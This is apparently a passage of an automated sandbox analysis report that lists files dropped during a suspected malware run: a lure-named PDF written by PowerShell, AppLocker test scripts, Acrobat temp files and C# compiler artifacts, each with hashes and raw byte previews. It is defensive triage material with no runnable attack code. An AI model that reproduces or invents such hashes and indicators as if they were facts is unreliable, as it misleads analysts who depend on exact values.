                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 8 09:58:08 2024, 1st section name ".debug$S"
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1332
                                                                                                                          Entropy (8bit):3.9989668852866394
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:H6FzW91iv09Hd9wKGmNII+ycuZhNYakSkPNnqS2d:OS9eKGmu1ulYa3kqSG
                                                                                                                          MD5:80E0A3100045F99934AF97251161B2D1
                                                                                                                          SHA1:87A02DBFA3194BD0D1D5F23E554CD0327CC0F7B3
                                                                                                                          SHA-256:325237CE4198B088CEE0B1E746F780FA08EB3716D2A8DD94059C0AA8454EF6E8
                                                                                                                          SHA-512:33D68FF62D5860734F1836E0C1CFAF9B61D81A6F7C814AEA369732582CE17985C81BA96ACA8E4004DE95818050BB9BAA36B9ED3DC8A103B000B54DF82A3107E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:L.....-g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\wpyeyr2r\CSCD8967564BBC847D191922ABCF6C6B3B.TMP................j_;.9.&.|x<...9..........5.......C:\Users\user\AppData\Local\Temp\RES8A4C.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.p.y.e.y.r.2.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                                                                          C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:PDF document, version 1.5, 4 pages
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):137244
                                                                                                                          Entropy (8bit):7.9463989977621825
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:99mMPAOkORGWf2QmVDkVo7N8LiMbWqyWWBtA0JikMLeHpn38V/cJZV:9gMPvmVDk+NnMSqyxZCLeHVMV/S
                                                                                                                          MD5:E9AA904AE264299DA9DA51C96D1DB804
                                                                                                                          SHA1:B2DEC099645CC33A51058565B9ACF413FDB310B9
                                                                                                                          SHA-256:FE903967341821E392F6A85ECE547C11CAEC83B3BAAECB8A968CC90E9F0F7B26
                                                                                                                          SHA-512:675649F5305717BEB06D587B1B1F71CB41D65640E0FD88D6846E92C22818FC6BC65A98CE4FE0DCE142EA620CDDEB1ECD4E9A144FF1EC061BA5BD370FFCA434A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDF-1.5.%.....1 0 obj.<<./Pages 2 0 R./Type /Catalog.>>.endobj.3 0 obj.<<./Producer (Skia/PDF m91)./rgid (PB:350074388_AS:1001673673687041@1615829022798).>>.endobj.2 0 obj.<<./Count 4./Kids [4 0 R 5 0 R 6 0 R 7 0 R]./Type /Pages.>>.endobj.4 0 obj.<<./Type /Page./Resources <<./ProcSet [/PDF /Text /ImageB /ImageC /ImageI]./ExtGState <<./G3 8 0 R./G8 9 0 R./G9 10 0 R.>>./XObject <<./X7 11 0 R.>>./Font <<./F4 12 0 R./F5 13 0 R./F6 14 0 R.>>.>>./MediaBox [0 0 595.91998 841.91998]./Annots [15 0 R 16 0 R 17 0 R 18 0 R 19 0 R 20 0 R 21 0 R]./Contents 22 0 R./StructParents 0./Parent 2 0 R.>>.endobj.5 0 obj.<<./Contents 23 0 R./MediaBox [0 0 596 843]./Parent 2 0 R./Resources <<./ExtGState <<./G3 24 0 R./G7 25 0 R.>>./Font <<./F4 26 0 R./F5 27 0 R./F6 28 0 R./F8 29 0 R.>>./ProcSet [/PDF /Text /ImageB /ImageC /ImageI].>>./StructParents 0./Type /Page.>>.endobj.6 0 obj.<<./Contents 30 0 R./MediaBox [0 0 596 843]./Parent 2 0 R./Resources <<./ExtGState <<./G3 24 0 R./G7 25 0 R.>>./Font <<./F4 26 0 R.

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hxcadfr.2dl.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4syjprkd.wsx.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ywoxhfh.hox.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af4mtrjd.k3f.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aoiexywl.hby.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5pegq5v.4m5.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lomta4iq.00d.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqorotpa.ejt.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opmari4y.dpu.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r42pw0o4.rs3.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sithg2ni.obw.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1e1lii4.4h2.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\0cf4a5cb-f80e-408a-a949-9d55491a6405.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 633642
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1405907
                                                                                                                          Entropy (8bit):7.975945065391471
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:kGZK9Iexj1bLgiZMHLRS9y8hBjnn9T5TcgyCCw/hn90hhcnDfYIGCa2EWHqbzG2E:kGZK9Ief0i+LRS9yan9GgEw/hqhhyDfT
                                                                                                                          MD5:E347AA96DF9BCB6D5CE863417AFA916B
                                                                                                                          SHA1:DFF5EFE6E3111A1154BB81BA6A216ACB155F1BBA
                                                                                                                          SHA-256:95D5309B2366210EA1168792DD23BD1A444D385C9C2B3D3ABE58BF081F8D5FC0
                                                                                                                          SHA-512:B6C8B4BB2A75709547AF506DAD4854C1DDC468B01CD5310A660FDBFBCC39EC9B2794B041B34A1292BEBC18E1323D8D28CE44023A991C09C0E2C977354C6AC370
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\14356e95-569d-44d1-be8e-b30978b7694e.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 939944
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):362282
                                                                                                                          Entropy (8bit):7.972590665273909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:kdG+V4lamSZXs1TOLpVzrKHdUNkjXYyvPoO6Mi7HzU+Nv+3zjZb67WAZFWUni:kRqIZXWOL3rKw4HL+NGvg7LW4i
                                                                                                                          MD5:BABCD4D2F710F800534DF8C7513FF17B
                                                                                                                          SHA1:D558575EA176DDC203476BB9EE7A65BA773C6293
                                                                                                                          SHA-256:7C330301AF2824A4AAF8E2EB3FF69798F0524FF960B00F35132FF00260E6D512
                                                                                                                          SHA-512:C952D057C520673627CDC07DFCE995BB3B30541D83FB283F2291F5B0D9014B068871DF41E0DB999204606249B1A92E1BC9D9509B3E71068731AA8CC8A29880DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........{[[G.8.......Hk./.$...kc'......x.2`[...P.f..oWU....s...d3<y..s.......?.5..v.w.....n..C7..]...+|w.F.....'K....O.......]..B.]........=p....=..]......7..........s....f1....'.o..[L\............h'~....u...}..p...s....m..q.j.'.'X....V.fV...}.g..{....=.......c..|..Y.{....>.M....x.g....s..g.........v...}.d..........p.#l}.g..v...Vq.C....{.....f~L.3|.g....}.'.?.3...vC.....M?..}..n.og.k~.^.}.O...5..$..;./.Uo...-..Wo.Wo.|..~w..O..+.7...To..N.....:...W...Z.U_...w......3.U_........G......'.}.....m|?.....?....W......w.z..|.........Zx...-..o'.....C?..0.2.b..#........{.o...........>..... 8...pk..~..).3.I;...C;....V.nv...;\_....Noa..V-..-..6.<...../......>_.g=.NB...0..0.9.?......N.p{..m.g......... ..._cO}...N..w|.c..;.,.....+........_m.._.#.5..'..1.zT....uu.fP.O.z.=.f..j...7.(.@!..._`........n...S.o.n[.F.u.{....-B]...c...x.(.)..s......[NB.].......]<.].7.w._=3...N...aeZ............../...=.....vf......!.,..... X....H...O|b...O..

                                                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\5ec17ae7-53fd-402b-b31f-a3b780f66111.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1418364
                                                                                                                          Entropy (8bit):7.976384385897213
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:tGZK9IejeYIGCa2NWH7jG2FZrj1bLgiZMHLRS9y8hBjnn9T5TcgyCCw/hn90hhcB:tGZK9IejeZGoWHHG2N0i+LRS9yan9Ggn
                                                                                                                          MD5:A56D4A67C1202BD15A157E348662D1CA
                                                                                                                          SHA1:6DE2245DE0ADB40A140E89ED0EEA2B241A2A211B
                                                                                                                          SHA-256:24C5D43351FE789D408EBAADA3180383F720C271A746EF327ECD0D07A3656F5D
                                                                                                                          SHA-512:E0739A32FD8B195788A7D8AAC316AFE1E2868507AC3BF754F44C2A6E5CB91D8478EDF76BDC535DA75C194F17278DB4C0BA78E72942855A02F1C0D09F40199EAD
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\64865316-e95d-4d75-a5df-f13859a6072d.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 58261
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):962913
                                                                                                                          Entropy (8bit):7.989737613179096
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:sSqOuLWyIu1IZX5v4uFVALJcU9yBpQVDg:8L3b1y5v4XcU2pH
                                                                                                                          MD5:3CA65333526BA2A3443F333CDBBB63A3
                                                                                                                          SHA1:572DEC0621247BE546C62ABA90E5D138EA7A28E5
                                                                                                                          SHA-256:3CFDCB5167F8EF9FDB201705382C9BE6014D320B123495B4701ADC489A8BE4D5
                                                                                                                          SHA-512:36E76386078697E45BC6BD6E92787878E36A0FF36328C71A2EDF90640DA681F63ACECFEE8F9CA382A52EB4C047D1D45FC5034F43A7C209EA774920321C9A1123
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........}[o\IzX1.d......8I.W.=-.o...Z...3...J...|..$[lv.."........S.......M.I`......... .8....w...%....@.K}......$G.v....s...W...z]...V.uCuT...TS.TC.U....[[m.}...|.....B..<.R.......?.]5..{jV=..............s.-@....Q3.F..z....|.>"hgO}..a.]h..o..l.O.{...P..../..C._...}..0.O...z......._P..O.(1..=..@..B%.1f...q:...Pf. ....mu.Z.z......"....,.\\..Kj.`8...l8.....Vh."*.M...l.j,C.2..3N.....u(s.>oC.E.e..a.~...."...n..G..2........a..G./...V.>_..9h..a.jl...J/Q_........\rz..7+Pf.J/A.y..c..L~.u.........w.J..L.......BM..z.@oE.......T"L......(..................=_....5hgK..g..z...4.....~...q{E.3..m.V.a.x.......Pk........3...c...^.@.C.......<......6.+......m...6.Q...9M.s..e.........$.m.M_.VV.d.~....g.x....x.M..l<....<A...6.8.....j.p.zDnF.K.v&1...C.@.P..=.......O....M.(..5..C.JD.6M...........>...*.4.........&I.-...*...P.d.....`\D1.nB...w....8.0z..;..O........g............@.e...w...NeZ^..a~@...E....*.....2..i.`...w.N..GT.)..v.<.....vD?.<..c......uq......G..)

                                                                                                                          C:\Users\user\AppData\Local\Temp\wpyeyr2r\CSCD8967564BBC847D191922ABCF6C6B3B.TMP

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          File Type:MSVC .res
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):652
                                                                                                                          Entropy (8bit):3.0918960869348746
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryw4Wak7Ynqqx4HPN5Dlq5J:+RI+ycuZhNYakSkPNnqX
                                                                                                                          MD5:0B6A5F3BD039D126EB7C783C80A8CA39
                                                                                                                          SHA1:231B8BAB4DA15F284B5C7C157065549CED206174
                                                                                                                          SHA-256:3D19B4A92C516B63993A7048BCF7CB8DDBADB0EE8C9680267E585B3606CCDA23
                                                                                                                          SHA-512:06414F69A686881BF14549843D0D736816D225D1BBA12804A74274B1A77BA537EC22EE1D41FFC548D7F0750C09F33BE94A56598C7FC0760267327C5DFBE4BD6B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.p.y.e.y.r.2.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.p.y.e.y.r.2.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                          C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.0.cs

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):244
                                                                                                                          Entropy (8bit):4.952945910145069
                                                                                                                          Encrypted:false
